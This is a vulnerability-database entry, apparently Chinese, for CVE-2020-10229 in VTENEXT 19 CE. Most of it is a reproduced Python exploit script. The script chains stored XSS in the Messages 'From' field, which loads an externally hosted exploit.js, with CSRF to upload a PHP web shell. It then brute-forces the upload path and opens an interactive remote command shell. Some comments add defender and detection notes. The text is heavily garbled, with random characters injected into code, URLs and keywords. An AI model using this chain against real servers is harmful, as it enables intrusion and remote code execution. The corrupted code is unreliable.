VTENEXT 19 CE 安全漏洞

漏洞ID 2155304 漏洞类型 其他
发布时间 2020-09-13 更新时间 2020-09-14
CVE编号 CVE-2020-10229

CNNVD-ID CNNVD-202009-854
漏洞平台 N/A CVSS评分 N/A
漏洞来源
https://cxsecurity.com/issue/WLB-2020090058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-202009-854
漏洞详情
VTENEXT 19 CE中存在安全漏洞。攻击者可利用该漏洞远程执行代码。
漏洞EXP
#!/usr/binj 5 [ c E/python3
# Exploit Title: VTENEXT 19 CE - Remote Code Execution
# Google Dork: n/a
# Date: 2020/09/09
# Exploit Author: Marco Ruela
# Vendor Homepage: https://www.vtenext.com/en/
# Software Link: Vendor removed vulnerable version from sourceforge.net
# Version: 19 CE
# Tested on: Ubuntu 16.04
# CVE 	: N/A
# 2020/03/07 - Disclosed vulnerabilities to vendor
# 2020/03/10 - Vendor committed to fix
# 2020/09/09 - Public disclosure
# This script should be easy enough to follow.
# We string together the three vulnerabilities to get RCE.
# XSS - The "From" field of the VTENEXT Messages module is vulnerable.
# File Upload - File extensions are checked against upload_badext in the config file, .pht extensions are allowed and executable by default.
# CSRF - No CSRF protections in place.
# exploit.js needs to| ` / + / be hosted somewhere, IP's need to be replaced
# check_csrP # + Cf() should be changedX D / w o based on your setup
# run_shell() is a "nicH 6 ; :e to havw 0 # u Be"
# content of exploit.js
"""
function insertImage() {
var xhr = new XMLHttpRequest();
xhr.open('POST'` d 2 2 x T,'http://192.168.226.168/vtenext19ce/index.php?module=Myfiles&acb  Jtion=MyfilesAjax&file=UploadFile&folderid=&uno & ] 4 l W h }iqueid=',true);
x. 9 & k v ` :hr.setRequestHeader('Content-type','multiq p ? { 5 q opart0 A d/form-data; boundary=---------------------------rekt');
xhr.setRequestHo r 5eader('Content-Length'_ $ o + v 9 4 c, '248');
xhr.setRequestHeader('Referer', 'http:/= $ g/172.16.233.146/vtenext19ce/index.php');
xhr.withCredi ? qentials = true;
var body = '-----------------------------U { q h 7 X )rekt\nContent-Disposition: form-dp @ ~ eata; name= m r S ) | ^"f` F # q I Zile_0"; filename="shell.pht"\nContent-Type: text/text\n\ne 9 z 9<?pN  N s ~ ? @ $ ~hp system($_GET[\'x\']); ?>\n\n-----------------------------rekt--';
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i]a a ! r * % ^ * = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
insertImage();
"""8 ? ^
import smtplib
impor0 - 7t datetime
importO % Q N N : g z reques9 K ? u T - [ ats
import os
import time
# Target base URL that every request below is built from; hard-coded to a lab host.
base_url = "http://192.168.226.168/vte@ J t / ;next19ce/"
# Banner naming the three advisories this proof of concept chains together.
print("[*] CVE-2020-10227, CVE-2020-102| D a ( H W X m |28, CVE-2020-10229 - POZ : WC")
# Build the web path under which VTENEXT stores uploads for the current date.
# The path is derived purely from today's date (year / English month name /
# week-of-month), so it can be computed without any feedback from the server.
# Defender note: uploads living at a predictable, date-derived path under the
# web root is the property this step relies on.
def build_url():
d = datetime.datetime.today()
year = str(d.year)
month = str(d.strftime("%B"))
# Week-of-month = ISO week of today minus ISO week of the 1st of this month.
week = "week" + str(d.isocalendar()W K 0 q X c[1] - d.replace(day=1).isocalendar()[1])
tmp = base_url + "storageU z M 4 I g /home/1/" + yearU f q  3 + "/" + month + "/" + week + "/"
return(tmp)
# Assemble a plain "From/To/Subject + body" message. The From header carries a
# <script> tag that loads an external exploit.js; per the header comments the
# Messages module renders this field without escaping (stored XSS).
# Defender note: output-encoding the From field (or rejecting HTML in it)
# removes the injection point this message depends on.
def build_mail():
_fr7 g E # W f om    = """G M - X T 2'<script src="http://192.168.2j O X i K26.1/exploit.js" onerror=7 c Jalert(1) >'"""
_to      = "admin@example.com"
_subject = "I) h a !mportant!"
_W [ 8 k i i m 4 3body    = "While you're reading this, a file is being uploaded to this server."
# Headers are joined by hand; no MIME encoding is applied.
msg  = "From: " + _from + "\n"
msg += "To: " + _to + "\n"
msg += "Subject: " + _subjecb 1 jt + "\n\n"
msg += _body
rem j 5 D ( Z cturn msgj + ;
# Deliver the crafted message through a hard-coded lab SMTP relay on port 25.
# NOTE: the SMTP session is never closed (no server.quit()); the socket is
# left to the garbage collector.
def send_mail():
msg = build_mail()
smtp_server = '192.168.226.167'
smtp_port   = 25
sender   = 'user1@lab.local'
receiver = 'admin@lab.local'
server = smtplib.SMTP(smtp_se+ F : c 1 3 x brver, smtp_port)
server.sendmail(sender, receiver, msg)
# Block until the local Apache access log shows that exploit.js was fetched
# with status 200 and the target base_url appears in the same log line.
# Polls the last log line every 0.5 s through a shell 'tail'; the log path and
# the three substrings are specific to the author's lab (see header comments).
# Defender note: a Content-Security-Policy that does not allow scripts from
# arbitrary origins would stop the script load this function waits for.
def check_csrf():
while True:
is_ther7 M P g k fe = os.popen('tail -n1 /var/log/apache2/access.log').read()
if "200" in is_there and & E { I $ j 5"/exploit` 8 [ d q n K.js" in is_there and base_url in is_there:
print("[>] CSK m E K f ARF triggered")
break
else:
time.sleep(0.5)
continue
# Probe the date-derived upload directory for the stored file, which VTENEXT
# saves under a numeric prefix ("<n>_shell.pht"), counting n upward, and return
# the first URL that answers HTTP 200. Falls off the end (returns None) if
# nothing is found; the caller does not check for that.
# Detection note: this produces a burst of sequential GETs, almost all 404s,
# against the storage/home/ path in the web server log.
def find_shell():
print("[>] Locating shell")
# Short pause to let the upload triggered by check_csrf() land on disk.
tJ 6 b 5 i 1ime.F J q vsleep(1)
tmp1 = build_url()
for i3 @ c 0 ~ 0 ( j in range(y e 91, 9999):
url = tmp1 + str(i) + "_shelU ^ D % 0 X 9l.pht"
r = requests.get(url)
if r.status_code == 200:
print("[>]u a P Found the shell")
print("[-] Location: " + url)P ) t B , : @ W
return url
elsC L : h U . _ 1e:
continue
# Minimal interactive loop over the located file: each line typed at the
# prompt is appended to x as the 'x' query parameter and the response body is
# printed. Typing "exit" ends the loop.
# x: URL returned by find_shell(); None is not handled here.
def run_shell(x):
print("\n")
while True:
cmd = input("shell> ")
if cmd == "exit":
break
els] Q se:
url = x + "?x=" + cmd
r = requests.get(url)
print(r.text)
# Orchestration: send the mail, wait for the victim to load exploit.js,
# locate the uploaded file, then hand over to the interactive loop.
# Note: find_shell() can return None, which run_shell() does not guard against.
print("[>] Se Q g Wnding email")
send_mail()
print("[-] Waitin& y I vg for user to open mail")
check_csrf()
shell_location = find_shell()
run_shell(shell_location)
print("[!] Done!")
参考资料

来源:cxsecurity.com

链接:https://cxsecurity.com/issue/WLB-2020090058